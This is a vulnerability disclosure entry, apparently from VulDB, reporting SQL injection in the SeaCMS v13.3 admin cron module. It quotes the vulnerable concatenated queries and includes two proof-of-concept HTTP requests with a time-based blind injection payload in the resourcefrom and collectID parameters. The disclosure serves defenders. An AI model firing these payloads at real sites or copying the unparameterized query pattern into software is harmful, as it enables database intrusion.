| Titel | SeaCMS v13.3.20250820 SQL Injection |
|---|
| Beschreibung | # Summary
SeaCMS v13.3.20250820 contains multiple SQL injection vulnerabilities in the admin panel's cron task management module (admin_cron.php).
# Details
## Root Causes
Direct SQL Concatenation: User input is directly embedded in SQL queries without parameterization.
Insufficient Sanitization: dhtmlspecialchars() only escapes HTML, not SQL.
Multiple Injection Points: Different parameters in the same endpoint are vulnerable.
Injection Point 1 (resourcefrom)
```
// In PlanMode=0 block:
$rfromarr = explode('#', $_POST['resourcefrom']); // Unsanitized
$rid = $rfromarr[0];
$url = $rfromarr[1];
$dsql->ExecuteNoneQuery("INSERT ... VALUES('$rid', '$url')"); // Direct concatenation
```
Injection Point 2 (collectID)
```
// In PlanMode=4 block:
$filename = "autocollectnews.php#".$_POST['collectID']."#...";
$dsql->ExecuteNoneQuery("INSERT ... VALUES('$filename')"); // No sanitization
```
# POC
## PoC #1: Time-Based Blind via resourcefrom
```
POST /[admins'URL]/admin_cron.php?action=addCron HTTP/1.1
Host: 127.0.01
Content-Type: application/x-www-form-urlencoded
Cookie: [Admin Cookie]
PlanMode=0&resourcefrom=00'XOR(0*if(now()=sysdate(),sleep(4),0))XOR'Z&...[other params]
```
Effect: Causes a 4-second delay if now()=sysdate() is true.
## PoC #2: Time-Based Blind via collectID (Multipart)
```
POST /[admins'URL]/admin_cron.php?action=addCron HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=----boundary
----boundary
Content-Disposition: form-data; name="collectID"
00'XOR(0*if(now()=sysdate(),sleep(4),0))XOR'Z
----boundary--
``` |
|---|
| Quelle | ⚠️ https://github.com/Hebing123/cve/issues/93 |
|---|
| Benutzer | jiashenghe (UID 39445) |
|---|
| Einreichung | 22.09.2025 12:22 (vor 7 Monaten) |
|---|
| Moderieren | 26.09.2025 14:44 (4 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 326112 [SeaCMS 13.3.20250820 Cron Task Management /admin_cron.php resourcefrom/collectID SQL Injection] |
|---|
| Punkte | 20 |
|---|